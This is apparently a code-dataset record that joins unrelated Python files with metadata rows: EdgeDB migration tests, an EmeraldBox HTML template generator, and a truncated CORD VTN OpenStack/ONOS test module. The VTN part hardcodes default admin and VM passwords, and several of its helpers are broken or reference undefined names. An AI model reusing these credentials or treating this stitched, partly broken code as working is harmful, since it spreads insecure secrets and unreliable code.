'comp': {42},
},
],
)
await self.migrate(r'''
type Foo {
property name -> str;
property comp := Alias.val;
};
type Bar;
alias Alias := Bar {val := 'val'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': {'val'},
},
],
)
@test.xfail('''
edgedb.errors.InvalidReferenceError: object type 'test::Fuz'
does not exist
''')
async def test_edgeql_migration_alias_07(self):
await self.migrate(r'''
type Foo {
property name -> str;
link comp := Alias.alias_link;
};
type Bar {
property val -> str;
};
type Fuz {
property val -> str;
};
alias Alias := Bar {
alias_link := Fuz {
alias_comp := 42,
}
};
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Bar {val := 'bar'};
INSERT Fuz {val := 'fuz'};
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp: {
val,
alias_comp,
},
}
''',
[
{
'name': 'foo',
'comp': [{
'val': 'fuz',
'alais_comp': 42,
}],
},
],
)
await self.migrate(r'''
type Foo {
property name -> str;
link comp := Alias.alias_link;
};
type Bar {
property val -> str;
};
type Fuz {
property val -> str;
};
alias Alias := Bar {
alias_link := Fuz {
alias_comp := 42,
}
};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp: {
val
},
}
''',
[
{
'name': 'foo',
'comp': [{
'val': 'bar',
'alais_comp': 42,
}],
},
],
)
class TestEdgeQLDataMigrationNonisolated(tb.DDLTestCase):
TRANSACTION_ISOLATION = False
async def test_edgeql_migration_eq_collections_25(self):
await self.con.execute(r"""
START MIGRATION TO {
module test {
alias Foo := [20];
}
};
POPULATE MIGRATION;
COMMIT MIGRATION;
""")
await self.con.execute(r"""
START MIGRATION TO {
module test {
}
};
POPULATE MIGRATION;
COMMIT MIGRATION;
""")
async def test_edgeql_ddl_collection_cleanup_06(self):
for _ in range(2):
await self.con.execute(r"""
CREATE FUNCTION cleanup_06(
a: int64
) -> tuple<int64, tuple<int64>>
USING EdgeQL $$
SELECT (a, ((a + 1),))
$$;
""")
await self.con.execute(r"""
DROP FUNCTION cleanup_06(a: int64)
""")
| 27.453701
| 79
| 0.390993
| 22,096
| 283,734
| 4.901837
| 0.041999
| 0.087997
| 0.048472
| 0.044206
| 0.840219
| 0.811672
| 0.763182
| 0.714812
| 0.674244
| 0.631903
| 0
| 0.017312
| 0.506101
| 283,734
| 10,334
| 80
| 27.456358
| 0.755587
| 0.032791
| 0
| 0.722746
| 0
| 0
| 0.535472
| 0.005977
| 0
| 0
| 0.000057
| 0
| 0.048661
| 1
| 0.000377
| false
| 0
| 0.001257
| 0
| 0.002389
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ed5299b123331663ab8d4095f44fa2080d4c581e
| 7,458
|
py
|
Python
|
emerald/template_generator.py
|
femmerling/EmeraldBox
|
68f5776577f0c929ca1f5ba23f1dfe480f813037
|
[
"MIT"
] | 17
|
2015-01-15T21:41:16.000Z
|
2021-01-10T15:34:09.000Z
|
emerald/template_generator.py
|
femmerling/EmeraldBox
|
68f5776577f0c929ca1f5ba23f1dfe480f813037
|
[
"MIT"
] | null | null | null |
emerald/template_generator.py
|
femmerling/EmeraldBox
|
68f5776577f0c929ca1f5ba23f1dfe480f813037
|
[
"MIT"
] | 5
|
2015-02-07T02:41:18.000Z
|
2016-11-11T02:50:21.000Z
|
import os.path
from config import BASEDIR
from config import WHITE_SPACE
def generate_index_template(model_name, model_components):
model_name = model_name.lower()
template_path = os.path.join(BASEDIR, 'app/templates/' + model_name + '.html')
template_file = open(template_path, 'w')
template_file.write("{% extends \"base.html\" %}\n")
template_file.write("{% block content %}\n")
template_file.write("\t\t<h1>List of " + model_name.title() + " Entries.</h1>\n")
template_file.write("\t\t<table id=\"list-view\">\n")
template_file.write("\t\t\t<thead>\n")
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td><b>ID</td>\n")
for component in model_components:
template_file.write("\t\t\t\t\t<td><b>" + component['field_name'].title() + "</b></td>\n")
template_file.write("\t\t\t\t\t<td><b> </td>\n")
template_file.write("\t\t\t\t\t<td><b> </td>\n")
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t\t</thead>\n")
template_file.write("\t\t\t{% if " + model_name + "_entries %}\n")
template_file.write("\t\t\t<tbody>\n")
template_file.write("\t\t\t{% for entry in " + model_name + "_entries %}\n")
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td><a href=\"/"+model_name+"/{{ entry.id }}\">{{ entry.id }}</a></td>\n")
for component in model_components:
template_file.write("\t\t\t\t\t<td>{{ entry." + component['field_name'] + " }}</td>\n")
template_file.write('\t\t\t\t\t<td><a href="/' + model_name + '/edit/{{ entry.id }}">Edit</a></td>\n')
template_file.write('\t\t\t\t\t<td><a id="delete-link" data-callback="/' + model_name + '/" data-url="/' + model_name + '/{{ entry.id }}">Delete</a></td>\n')
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t\t{% endfor %}\n")
template_file.write("\t\t\t</tbody>\n")
template_file.write("\t\t</table>\n")
template_file.write("\t\t\t{% else %}\n")
template_file.write("\t\t</table>\n")
template_file.write("\t\tYou have no entries yet\n")
template_file.write("\t\t\t{% endif %}\n")
template_file.write('\t\t\t<br/><br/><b><a id="actions" href="/' + model_name + '/add">Add new entry</a></b>\n')
template_file.write("{% endblock %}\n")
print "index template generated"
def generate_view_template(model_name, model_components):
model_name = model_name.lower()
template_path = os.path.join(BASEDIR, 'app/templates/' + model_name + '_view.html')
template_file = open(template_path, 'w')
template_file.write("{% extends \"base.html\" %}\n")
template_file.write("{% block content %}\n")
template_file.write("\t\t<h1>View " + model_name.title() + " single entry.</h1>\n")
template_file.write("\t\t<table>\n")
for component in model_components:
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td>" + component['field_name'].title() + ":</td>\n")
template_file.write("\t\t\t\t\t<td>{{ " + model_name + "." + component['field_name'].lower() + " }}</td>\n")
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t</table>\n")
template_file.write("{% endblock %}")
print 'view template generated'
def generate_edit_template(model_name, model_components):
model_name = model_name.lower()
controller_path = os.path.join(BASEDIR, 'app/controllers/'+model_name+'.py')
template_path = os.path.join(BASEDIR, 'app/templates/' + model_name + '_edit.html')
controller_file = open(controller_path, 'a')
controller_file.write("@"+model_name+"_view.route('/" + model_name + "/edit/<id>')\n")
controller_file.write("def " + model_name + "_edit_controller(id):\n")
controller_file.write(WHITE_SPACE + "#this is the controller to edit model entries\n")
controller_file.write(WHITE_SPACE + model_name + "_item = " + model_name.title() + ".query.get(id)\n")
controller_file.write(WHITE_SPACE + "return render_template('" + model_name + "_edit.html', " + model_name + "_item = " + model_name + "_item, title = \"Edit Entries\")\n\n")
template_file = open(template_path, 'w')
template_file.write("{% extends \"base.html\" %}\n")
template_file.write("{% block content %}\n")
template_file.write("\t\t<h1>Edit " + model_name.title() + " Entries.</h1>\n")
template_file.write("\t\t<form id=\"edit-form\" name=\"" + model_name + "_add\" method=\"put\" action=\"/" + model_name + "/{{ " + model_name + "_item.id }}\">\n")
template_file.write("\t\t<input type=\"hidden\" id=\"url\" value=\"/"+model_name+"/{{ " + model_name + "_item.id }}\">\n")
template_file.write("\t\t<table>\n")
for component in model_components:
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td>" + component['field_name'].title() + ":</td>\n")
template_file.write("\t\t\t\t\t<td><input type=\"text\" name=\"" + component['field_name'].lower() + "\" value=\"{{ " + model_name + "_item." + component['field_name'].lower() + " }}\"/></td>\n")
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td><input id=\"submit-put\" type=\"submit\" name=\"submit\" value=\"Edit Entry\"/></td>\n")
template_file.write("\t\t\t\t\t<td> </td>\n")
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t</table>\n")
template_file.write("\t\t</form>\n")
template_file.write("{% endblock %}")
print 'Entries edit and update form controller added'
def generate_controller_template(model_name, model_components):
model_name = model_name.lower()
controller_path = os.path.join(BASEDIR, 'app/controllers/'+model_name+'.py')
template_path = os.path.join(BASEDIR, 'app/templates/' + model_name + '_add.html')
controller_file = open(controller_path, 'a')
controller_file.write("@"+model_name+"_view.route('/" + model_name + "/add/')\n")
controller_file.write("def " + model_name + "_add_controller():\n")
controller_file.write(WHITE_SPACE + "#this is the controller to add new model entries\n")
controller_file.write(WHITE_SPACE + "return render_template('" + model_name + "_add.html', title = \"Add New Entry\")\n\n")
template_file = open(template_path, 'w')
template_file.write("{% extends \"base.html\" %}\n")
template_file.write("{% block content %}\n")
template_file.write("\t\t<h1>Add new " + model_name.title() + " Entries.</h1>\n")
template_file.write("\t\t<form name=\"" + model_name + "_add\" method=\"post\" action=\"/" + model_name + "/\">\n")
template_file.write("\t\t<table>\n")
for component in model_components:
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td>" + component['field_name'].title() + ":</td>\n")
template_file.write("\t\t\t\t\t<td><input type=\"text\" name=\"" + component['field_name'].lower() + "\"/></td>\n")
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td><input type=\"submit\" name=\"submit\" value=\"Add Entry\"/></td>\n")
template_file.write("\t\t\t\t\t<td> </td>\n")
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t</table>\n")
template_file.write("\t\t</form>\n")
template_file.write("{% endblock %}")
print 'Data add form controller generated'
# end of file
| 52.521127
| 203
| 0.629525
| 1,152
| 7,458
| 3.897569
| 0.086806
| 0.067706
| 0.06147
| 0.25657
| 0.830735
| 0.804454
| 0.790869
| 0.765924
| 0.752339
| 0.752339
| 0
| 0.001247
| 0.139716
| 7,458
| 142
| 204
| 52.521127
| 0.698566
| 0.001475
| 0
| 0.517544
| 1
| 0.008772
| 0.359388
| 0.024711
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.026316
| null | null | 0.035088
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ed5355e81bd0d49ef118c0f9cf73d96eeb0001fa
| 95
|
py
|
Python
|
test/module/file.py
|
yawpei/pylearning
|
b0e8b6cf62074c284ea10a0473766fdf9892565a
|
[
"Apache-2.0"
] | null | null | null |
test/module/file.py
|
yawpei/pylearning
|
b0e8b6cf62074c284ea10a0473766fdf9892565a
|
[
"Apache-2.0"
] | null | null | null |
test/module/file.py
|
yawpei/pylearning
|
b0e8b6cf62074c284ea10a0473766fdf9892565a
|
[
"Apache-2.0"
] | null | null | null |
# file.py
def create_name():
return "new_file.txt"
def create_time():
return "today"
| 11.875
| 25
| 0.652632
| 14
| 95
| 4.214286
| 0.714286
| 0.305085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 95
| 7
| 26
| 13.571429
| 0.786667
| 0.073684
| 0
| 0
| 0
| 0
| 0.197674
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
ed70674cedd77b886a4a585262c099fed50a7d65
| 279,854
|
py
|
Python
|
src/test/cordvtn/cordvtnTest.py
|
huseyinbolt/cord-tester
|
ed9b79916e6326a45bfaf3227b8ff922d76df4f1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/test/cordvtn/cordvtnTest.py
|
huseyinbolt/cord-tester
|
ed9b79916e6326a45bfaf3227b8ff922d76df4f1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/test/cordvtn/cordvtnTest.py
|
huseyinbolt/cord-tester
|
ed9b79916e6326a45bfaf3227b8ff922d76df4f1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Copyright 2016-present Ciena Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import os,sys
import keystoneclient.v2_0.client as ksclient
import keystoneclient.apiclient.exceptions
import neutronclient.v2_0.client as nclient
import neutronclient.common.exceptions
import novaclient.v1_1.client as novaclient
from novaclient import client as nova_client
from multiprocessing import Pool
from neutronclient.v2_0 import client as neutron_client
import neutronclient.v2_0.client as neutronclient
from nose.tools import assert_equal
from CordTestUtils import get_mac, log_test
from onosclidriver import OnosCliDriver
from OnosCtrl import OnosCtrl
from CordLogger import CordLogger
from TestManifest import TestManifest
from OnosFlowCtrl import OnosFlowCtrl
from scapy.all import *
from credentials import *
from VSGAccess import VSGAccess
from SSHTestAgent import SSHTestAgent
import requests
import time
import py_compile
import json
PROTO_NAME_TCP = 'tcp'
PROTO_NAME_ICMP = 'icmp'
IPv4 = 'IPv4'
OS_USERNAME = 'admin'
OS_PASSWORD = 'VeryLongKeystoneAdminPassword'
OS_TENANT = 'admin'
OS_AUTH_URL = 'https://keystone.cord.lab:5000/v2.0'
OS_SERVICE_ENDPOINT = 'https://keystone.cord.lab:5000/v2.0/'
VM_BOOT_TIMEOUT = 100
VM_DELETE_TIMEOUT = 100
#VM SSH CREDENTIALS
VM_USERNAME = 'ubuntu'
VM_PASSWORD = 'ubuntu'
TENANT_PREFIX = 'test-'
VM_PREFIX = 'test-'
NETWORK_PREFIX = 'test-'
CIDR_PREFIX = '192.168'
class vtn_validation_utils:
endpoint = '172.17.0.5'
version = ''
vtn_app = 'org.opencord.vtn'
def __init__(self, version):
self.version = version
self.manifest = None
self.vtn_enabled = False
manifest = os.getenv('MANIFEST', None)
if manifest:
self.manifest = TestManifest(manifest = manifest)
self.endpoint = self.manifest.onos_ip
self.vtn_enabled = self.manifest.synchronizer == 'vtn'
self.app_ctrl = OnosCtrl(self.vtn_app, controller = self.endpoint)
def getDevices(self):
return OnosCtrl.get_devices(controller = self.endpoint)
def getLinks(self):
return OnosCtrl.get_links(controller = self.endpoint)
def getDevicePorts(self, switch_id):
return OnosCtrl.get_ports_device(switch_id, controller = self.endpoint)
def activateVTNApp(self):
return self.app_ctrl.activate()
def deactivateVTNApp(self):
return self.app_ctrl.deactivate()
class cordvtn_exchange(CordLogger):
app_cordvtn = 'org.opencord.vtn'
test_path = os.path.dirname(os.path.realpath(__file__))
cordvtn_dir = os.path.join(test_path, '..', 'setup')
cordvtn_conf_file = os.path.join(test_path, '..', '../cordvtn/network_cfg.json')
head_node_user = 'vagrant'
head_node_pass = 'vagrant'
head_node = os.getenv('HEAD_NODE', 'prod')
head_node_ip = '10.1.0.1'
HEAD_NODE = head_node + '.cord.lab' if len(head_node.split('.')) == 1 else head_node
@classmethod
def setUpClass(cls):
''' Activate the cordvtn app'''
time.sleep(3)
cls.onos_ctrl = OnosCtrl(cls.app_cordvtn)
status, _ = cls.onos_ctrl.activate()
#assert_equal(status, True)
time.sleep(3)
cls.cordvtn_setup()
@classmethod
def tearDownClass(cls):
'''Deactivate the cord vtn app'''
#cls.onos_ctrl.deactivate()
#cls.cord_vtn_cleanup()
@classmethod
def cordvtn_setup(cls):
pass
@classmethod
def cord_vtn_cleanup(cls):
##reset the ONOS port configuration back to default
pass
@classmethod
def onos_load_config(cls, cordvtn_conf_file):
status, code = OnosCtrl.config(cordvtn_conf_file)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
time.sleep(3)
def get_neutron_credentials(self):
n = {}
n['username'] = os.environ['OS_USERNAME']
n['password'] = os.environ['OS_PASSWORD']
n['auth_url'] = os.environ['OS_AUTH_URL']
n['tenant_name'] = os.environ['OS_TENANT_NAME']
n['ca_cert'] = os.environ['REQUESTS_CA_BUNDLE']
return n
@classmethod
def get_compute_nodes(cls):
credentials = get_nova_credentials_v2()
novaclient = nova_client.Client('2', **credentials)
print novaclient.hypervisors.list()
return novaclient.hypervisors.list()
def create_network(i):
neutron_credentials = get_neutron_credentials()
neutron = neutron_client.Client(**neutron_credentials)
json = {'network': {'name': 'network-' + str(i),
'admin_state_up': True}}
while True:
try:
net = neutron.create_network(body=json)
print '\nnetwork-' + str(i) + ' created'
return net
except Exception as e:
print e
continue
def create_tenant(tenant_name):
new_tenant = keystone.tenants.create(tenant_name=tenant_name,
description="CORD Tenant \
created",
enabled=True)
tenant_id = new_tenant.id
tenant_status = True
user_data = []
for j in range(2):
j += 1
user_name = tenant_name + '-user-' + str(j)
user_data.append(create_user(user_name, tenant_id))
print " Tenant and User Created"
tenant_data = {'tenant_name': tenant_name,
'tenant_id': tenant_id,
'status': tenant_status}
return tenant_data
def create_user(user_name, tenant_id):
new_user = keystone.users.create(name=user_name,
password="ubuntu",
tenant_id=tenant_id)
print(' - Created User %s' % user_name)
keystone.roles.add_user_role(new_user, member_role, tenant_id)
if assign_admin:
admin_user = keystone.users.find(name='admin')
admin_role = keystone.roles.find(name='admin')
keystone.roles.add_user_role(admin_user, admin_role, tenant_id)
user_data = {'name': new_user.name,
'id': new_user.id}
return user_data
def create_port( router_id, network_id):
credentials = get_credentials()
neutron = client.Client(**credentials)
router = neutron.show_router(router_id)
value = {'port':{
'admin_state_up':True,
'device_id': router_id,
'name': 'port1',
'network_id':network_id,
}}
response = neutron.create_port(body=value)
def router_create(self, name):
external_network = None
for network in self.neutron.list_networks()["networks"]:
if network.get("router:external"):
external_network = network
break
if not external_network:
raise Exception("Alarm! Can not to find external network")
gw_info = {
"network_id": external_network["id"],
"enable_snat": True
}
router_info = {
"router": {
"name": name,
"external_gateway_info": gw_info,
"tenant_id": self.tenant_id
}
}
router = self.neutron.router_create(router_info)['router']
return router
def delete_tenant(tenant_name):
tenant = keystone.tenants.find(name=tenant_name)
for j in range(2):
j += 1
user_name = tenant_name + '-user-' + str(j)
delete_user(user_name, tenant.id)
tenant.delete()
print(' - Deleted Tenant %s ' % tenant_name)
return True
def delete_user(user_name, tenant_id):
user = keystone.users.find(name=user_name)
user.delete()
print(' - Deleted User %s' % user_name)
return True
def set_environment(tenants_num=0, networks_per_tenant=1, vms_per_network=2):
octet = 115
vm_inc = 11
image = nova_connection.images.get(IMAGE_ID)
flavor = nova_connection.flavors.get(FLAVOR_ID)
admin_user_id = keystone_connection.users.find(name=OS_USERNAME).id
member_role_id = keystone_connection.roles.find(name='Member').id
for num_tenant in range(1, tenants_num+1):
tenant = keystone_connection.tenants.create('%stenant%s' % (TENANT_PREFIX, num_tenant))
keystone_connection.roles.add_user_role(admin_user_id, member_role_id, tenant=tenant.id)
for num_network in range(networks_per_tenant):
network_json = {'name': '%snet%s' % (NETWORK_PREFIX, num_tenant*10+num_network),
'admin_state_up': True,
'tenant_id': tenant.id}
network = neutron_connection.create_network({'network': network_json})
subnet_json = {'name': '%ssubnet%s' % (NETWORK_PREFIX, num_tenant*10+num_network),
'network_id': network['network']['id'],
'tenant_id': tenant.id,
'enable_dhcp': True,
'cidr': '%s.%s.0/24' % (CIDR_PREFIX, octet), 'ip_version': 4}
octet += 1
subnet = neutron_connection.create_subnet({'subnet': subnet_json})
router_json = {'name': '%srouter%s' % (NETWORK_PREFIX, num_tenant*10+num_network),
'tenant_id': tenant.id}
router = neutron_connection.router_create({'router': router_json})
port = neutron_connection.add_interface_router(router['router']['id'], {'subnet_id': subnet['subnet']['id']})
for num_vm in range(vms_per_network):
tenant_nova_connection = novacli.Client(OS_USERNAME, OS_PASSWORD, tenant.name, OS_AUTH_URL)
m = tenant_nova_connection.servers.create('%svm%s' % (VM_PREFIX, vm_inc), image, flavor, nics=[{'net-id': network['network']['id']}, {'net-id': MGMT_NET}])
vm_inc += 1
def verify_neutron_crud():
x = os.system("neutron_test.sh")
return x
def list_floatingips( **kwargs):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
return neutron.list_floatingips(**kwargs)['floatingips']
def list_security_groups( **kwargs):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
return neutron.list_security_groups(**kwargs)['security_groups']
def list_subnets( **kwargs):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
return neutron.list_subnets(**kwargs)['subnets']
def list_networks( **kwargs):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
return neutron.list_networks(**kwargs)['networks']
def list_ports( **kwargs):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
return neutron.list_ports(**kwargs)['ports']
def list_routers( **kwargs):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
return neutron.list_routers(**kwargs)['routers']
def update_floatingip( fip, port_id=None):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.update_floatingip(fip, {"floatingip":
{"port_id": port_id}})
def update_subnet( subnet_id, **subnet_params):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.update_subnet(subnet_id, {'subnet': subnet_params})
def update_router( router_id, **router_params):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.update_router(router_id, {'router': router_params})
def router_gateway_set( router_id, external_gateway):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.update_router(
router_id, {'router': {'external_gateway_info':
{'network_id': external_gateway}}})
def router_gateway_clear( router_id):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.update_router(
router_id, {'router': {'external_gateway_info': None}})
def router_add_interface( router_id, subnet_id):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.add_interface_router(router_id, {'subnet_id': subnet_id})
def router_rem_interface( router_id, subnet_id):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.remove_interface_router(
router_id, {'subnet_id': subnet_id})
def create_floatingip( **floatingip_params):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
response = neutron.create_floatingip(
{'floatingip': floatingip_params})
if 'floatingip' in response and 'id' in response['floatingip']:
return response['floatingip']['id']
def make_iperf_pair(server, client, **kwargs):
ssh = SSHClient()
ssh.set_missing_host_key_policy(MissingHostKeyPolicy())
ssh.connect(server, username=VM_USERNAME, password=VM_PASSWORD)
ssh.exec_command('/usr/local/bin/iperf3 -s -D')
ssh.connect(client, username=VM_USERNAME, password=VM_PASSWORD)
stdin, stdout, stderr = ssh.exec_command('/usr/local/bin/iperf3 -c %s -J' % server)
rawdata = stdout.read()
data = json.loads(rawdata.translate(None,'\t').translate(None,'\n'))
return data
def connect_ssh(os_ip, private_key_file=None, user='ubuntu'):
key = ssh.RSAKey.from_private_key_file(private_key_file)
client = ssh.SSHClient()
client.set_missing_host_key_policy(ssh.WarningPolicy())
client.connect(ip, username=user, pkey=key, timeout=5)
return client
def validate_vtn_flows(switch):
egress = 1
ingress = 2
egress_map = { 'ether': '00:00:00:00:00:03', 'ip': '192.168.30.1' }
ingress_map = { 'ether': '00:00:00:00:00:04', 'ip': '192.168.40.1' }
device_id = 'of:{}'.format(get_mac(switch))
ctlr = self.ctlr_ip.split(',')[0]
flow = OnosFlowCtrl(deviceId = device_id,
egressPort = egress,
ingressPort = ingress,
ethType = '0x800',
ipSrc = ('IPV4_SRC', ingress_map['ip']+'/32'),
ipDst = ('IPV4_DST', egress_map['ip']+'/32'),
controller = ctlr
)
flow_id = flow.findFlow(device_id, IN_PORT = ('port', ingress),
ETH_TYPE = ('ethType','0x800'), IPV4_SRC = ('ip', ingress_map['ip']+'/32'),
IPV4_DST = ('ip', egress_map['ip']+'/32'))
if flow_id:
return True
def cliEnter(self):
retries = 0
while retries < 3:
self.cli = OnosCliDriver(connect = True)
if self.cli.handle:
break
else:
retries += 1
time.sleep(2)
def cliExit(self):
self.cli.disconnect()
def cordvtn_config_load(self, config = None):
if config:
for k in config.keys():
if cordvtn_config.has_key(k):
cordvtn_config[k] = config[k]
self.onos_load_config(self.cordvtn_dict)
def search_value(self, d, pat):
match = False
for k, v in d.items():
if isinstance(v, dict):
match = self.search_value(v, pat)
if match is True:
break
elif type(v) is list:
for i in range(len(v)):
if type(v[i]) is dict:
match = self.search_value(v[i], pat)
if match is True:
break
else:
if v[i] == pat:
match = True
return match
elif v == pat:
match = True
return match
if match is True:
print"Network search is successful"
return match
def get_key_value(self, d, key = None, value = None,):
match = False
ret_k = ""
ret_v = ""
if type(d) is not dict:
if type(d) is not list:
match = 'NOT_FOUND'
return [match, ret_k, ret_v]
else:
for i in range(len(d)):
if type(d[i]) is dict:
match,ret_k,ret_v = self.get_key_value(d[i], key, value)
if match is True:
print "Network creation is successful"
break
else:
for k, v in d.items():
if isinstance(v, dict):
match,ret_k,ret_v = self.get_key_value(v, key, value)
if match is True:
break
elif type(v) is list:
for i in range(len(v)):
if type(v[i]) is dict:
match,ret_k,ret_v = self.get_key_value(v[i], key, value)
if match is True:
break
else:
if key:
if k == key:
match = True
return [match, key, v]
elif value:
if v == value:
match = True
return [match, k, value]
else:
if key:
if k == key:
match = True
return [match, key, v]
elif value:
if v == value:
match = True
return [match, k, value]
if match == False:
match = 'NOT_FOUND'
return [match, ret_k, ret_v]
def neutron_network_creation_and_validation(self, net_name):
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": net_name,"admin_state_up":True}}
net = neutron.create_network(body=body_example)
networks = neutron.list_networks(name=net_name)
data = networks
return self.search_value(data, net_name)
def neutron_network_deletion(self, net_name):
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
networks = neutron.list_networks(name=net_name)
net_id = self.get_key_value(d=networks, key = 'id')
net = neutron.delete_network(net_id[2])
return self.get_key_value(d=networks, value = net_name)
def temp_neutron_subnet_creation_and_validation_v1(self,net_name,sub_cird, sub_net_start = "172.27.0.2", sub_net_end = "172.27.0.200"):
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
networks = neutron.list_networks(name=net_name)
net_id = self.get_key_value(d=networks, key = 'id')
cidr = sub_cird
body_subnet_example = {"subnet":{"network_id": net_id[2],"ip_version":4, "cidr":str(cidr), "allocation_pools": [{"start": "172.27.0.20", "end": "172.27.0.21"}]}}
neutron_sub = neutron.create_subnet(body_subnet_example)
networks = neutron.list_networks(name=net_name)
return self.get_key_value(d=networks, key = 'subnets')
def neutron_subnet_creation_and_validation(self,net_name,sub_cird):
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
networks = neutron.list_networks(name=net_name)
net_id = self.get_key_value(d=networks, key = 'id')
if sub_cird[0] == 'management':
cidr = sub_cird[1]
body_subnet_example = {"subnet":{"network_id": net_id[2],"ip_version":4, "cidr":str(cidr), "allocation_pools": [{"start": sub_cird[2], "end": sub_cird[3]}]}}
elif sub_cird[0] == 'public':
cidr = sub_cird[1]
gate_way = sub_cird[2]
body_subnet_example = {"subnet":{"network_id": net_id[2],"ip_version":4, "cidr":str(cidr), "gateway_ip":str(gate_way)}}
elif sub_cird[0] == 'private':
cidr = sub_cird[1]
gate_way = sub_cird[2]
body_subnet_example = {"subnet":{"network_id": net_id[2],"ip_version":4, "cidr":str(cidr), "gateway_ip":str(gate_way)}}
neutron_sub = neutron.create_subnet(body_subnet_example)
networks = neutron.list_networks(name=net_name)
return self.get_key_value(d=networks, key = 'subnets')
def sub_network_type_post_to_onos(self,net_name,sub_net_type):
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
networks = neutron.list_networks(name=net_name)
net_id = self.get_key_value(d=networks, key = 'id')
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
network_data = {"ServiceNetwork":{"id": net_id[2],"type":sub_net_type, "providerNetworks":[]}}
json_network_type_data = json.dumps(network_data)
resp = requests.post(url=url, auth=auth, data =json_network_type_data)
return resp
def service_dependency_on_network_post_to_onos(self,service_network_name,provider_network_name,service_network_type ='private'):
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
service_network = neutron.list_networks(name=service_network_name)
service_net_id = self.get_key_value(d=service_network, key = 'id')
provider_network = neutron.list_networks(name=provider_network_name)
provider_net_id = self.get_key_value(d=provider_network, key = 'id')
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
network_data = {"ServiceNetwork":{"id": service_net_id[2],"type":service_network_type, "providerNetworks":[{"bidirectional": 'true', "id": provider_net_id[2]}]}}
json_network_type_data = json.dumps(network_data)
